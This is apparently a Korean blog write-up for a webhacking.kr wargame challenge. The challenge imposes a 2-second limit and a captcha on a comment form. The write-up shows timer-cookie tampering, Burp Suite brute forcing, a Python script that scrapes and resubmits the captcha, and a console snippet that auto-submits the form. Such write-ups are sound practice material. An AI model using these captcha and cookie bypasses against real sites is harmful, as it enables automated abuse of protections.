먼저 맨 위에 time limit: 2second 가 있다.
nickname 과 comment 를 입력해주고
captcha를 적어줘야할꺼같다.
2초안에 하려면, 제한시간을 늘려주거나, timer를 멈춰주어야한다.
st가 timer 역할을 해주는것같은데 시작 타이머 값을 늘려주었다.
너무 늘려준건지 No cheat 문구가 뜬다 이렇게 하는게 맞는듯
대충 중간값에 끼도록 범위에 넣고 Burp suite 를 이용해서 공격해줬다.
근데 이게 되려면 하나 공격하는데 걸리는 시간이 1초보다 짧아야 될텐데 느리다.
일단 python 으로 해서 해보자.
먼저 파이썬으로 해야하는 것을 적어보자면
________________________________________
웹사이트에서 captcha 값을 읽어와야한다.
그리고 id, cmt, captcha 변수에 입력해줘야 한다.
그리고 그냥 Submit 해주면 2초가 안걸릴꺼같은데,
문제 의도대로 가자면 cookie 에서 값을 받아오고, 그 쿠키 값에서부터 크기를 계속 증가시킨 값을 쿠키로 주면서 해야된다.
import requests
import re
URL = "https://webhacking.kr/challenge/code-4/index.php"
cookies = {
'PHPSESSID': 'p4n9t3fuvi3535tjomtm5bv0ol',
'st': '1//st 값은 막 넣어주고
data = {
'id': 'aa',
'cmt': 'aa'
}
response = requests.get(URL, cookies = cookies)
text = response.text //
idx=text.find('value=')
value = text[idx + 7: idx + 17] //value = captcha 값
cookies['st'] = response.headers['Set-Cookie'].split('=')[1]
data['captcha'] = value
response = requests.post(URL, data = data, cookies = cookies)
print(response.status_code)
print(response.text)lv5frm.id.value = 'ㅁ'
lv5frm.cmt.value = 'ㅁ'
lv5frm.captcha.value = lv5frm.captcha_.value
lv5frm.submit()
를 콘솔창에 입력해주어도 된다.
이건 말그대로 프로그래밍해서 넣어준 값이기 때문에, 값이 2초안에 들어간다.
'WriteUp > Webhacking.kr' 카테고리의 다른 글
| webhacking.kr : challenge 22 (0) | 2020.09.11 |
|---|---|
| webhacking.kr : challenge 21 (0) | 2020.09.11 |
| webhacking.kr : challenge (0) | 2020.09.11 |
| webhacking.kr : challenge 14 (0) | 2020.09.11 |
| webhacking.kr : challenge 12 (0) | 2020.09.11 |